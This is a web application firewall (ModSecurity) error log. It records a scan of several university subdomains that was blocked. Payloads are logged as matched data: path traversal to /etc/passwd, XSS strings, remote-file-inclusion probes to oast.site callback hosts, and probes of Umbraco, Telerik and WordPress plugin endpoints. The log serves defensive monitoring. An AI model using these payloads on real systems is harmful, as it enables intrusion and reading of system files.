[uri "/ssi/printenv.shtml"] [unique_id "ZO16VsCo-f0AAAqeFcYAAAAx"]
[Tue Aug 29 11:55:51.165729 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16V8Co-f0AAAqeFc8AAAAx"]
[Tue Aug 29 11:55:51.649179 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAolKxgAAAAe"]
[Tue Aug 29 11:55:51.767368 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAApbUpUAAAAh"]
[Tue Aug 29 11:55:51.940899 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAolKxwAAAAe"]
[Tue Aug 29 11:55:51.946809 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAqY6LAAAAAr"]
[Tue Aug 29 11:55:52.012913 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqY6LEAAAAr"]
[Tue Aug 29 11:55:52.036875 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqeFdMAAAAx"]
[Tue Aug 29 11:55:52.045751 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAolKyAAAAAe"]
[Tue Aug 29 11:55:52.052991 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUpoAAAAh"]
[Tue Aug 29 11:55:52.146113 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb08o1ezecu1ng9h.oast.site found within TX:1: cjmnijtjmimvgniikdb08o1ezecu1ng9h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUp4AAAAh"]
[Tue Aug 29 11:55:52.159095 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqY6LgAAAAr"]
[Tue Aug 29 11:55:52.216881 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0zgije1b3fi9yb.oast.site found within TX:1: cjmnijtjmimvgniikdb0zgije1b3fi9yb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6LsAAAAr"]
[Tue Aug 29 11:55:52.225023 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rprch7rxn4h4f.oast.site found within TX:1: cjmnijtjmimvgniikdb0rprch7rxn4h4f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqeFdsAAAAx"]
[Tue Aug 29 11:55:52.225073 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06wfej7khcijkd.oast.site found within TX:1: cjmnijtjmimvgniikdb06wfej7khcijkd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUqIAAAAh"]
[Tue Aug 29 11:55:52.244408 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqeFdwAAAAx"]
[Tue Aug 29 11:55:52.299160 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0mx13jqzs9j1ts.oast.site found within TX:1: cjmnijtjmimvgniikdb0mx13jqzs9j1ts.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAArB1rYAAAAV"]
[Tue Aug 29 11:55:52.530487 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0h3rnntbbo3ni6.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0h3rnntbbo3ni6.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArD6a8AAAAX"]
[Tue Aug 29 11:55:52.537344 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rkexit1nmqn4h.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0rkexit1nmqn4h.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAqeFeAAAAAx"]
[Tue Aug 29 11:55:52.551268 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb016cqno5sposrx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb016cqno5sposrx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArD6bAAAAAX"]
[Tue Aug 29 11:55:52.557279 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0u9tbzxe561c3e.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0u9tbzxe561c3e.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAq4fYUAAAAJ"]
[Tue Aug 29 11:55:52.558232 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAApbUqgAAAAh"]
[Tue Aug 29 11:55:52.667418 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb05ubhcxidbcwdy.oast.site/ found within TX:1: cjmnijtjmimvgniikdb05ubhcxidbcwdy.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArC7Z8AAAAW"]
[Tue Aug 29 11:55:52.669373 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAq4fYoAAAAJ"]
[Tue Aug 29 11:55:52.687559 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAArC7aAAAAAW"]
[Tue Aug 29 11:55:52.688058 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAApbUq4AAAAh"]
[Tue Aug 29 11:55:52.726902 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAArC7aIAAAAW"]
[Tue Aug 29 11:55:53.576069 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAApbUrEAAAAh"]
[Tue Aug 29 11:55:53.579305 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0neqqzo7nezd3k.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0neqqzo7nezd3k.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArB1r8AAAAV"]
[Tue Aug 29 11:55:53.605468 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAArC7aQAAAAW"]
[Tue Aug 29 11:55:53.675078 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09oin889ctpmed.oast.site/ found within TX:1: cjmnijtjmimvgniikdb09oin889ctpmed.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAolKyoAAAAe"]
[Tue Aug 29 11:55:53.684093 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb065t4tejzbs3bz.oast.site/ found within TX:1: cjmnijtjmimvgniikdb065t4tejzbs3bz.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bQAAAAX"]
[Tue Aug 29 11:55:53.735916 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAAqTvzMAAAAa"]
[Tue Aug 29 11:55:53.739095 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0p6xyf3rt7x3su.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0p6xyf3rt7x3su.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bUAAAAX"]
[Tue Aug 29 11:55:53.807650 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArD6bYAAAAX"]
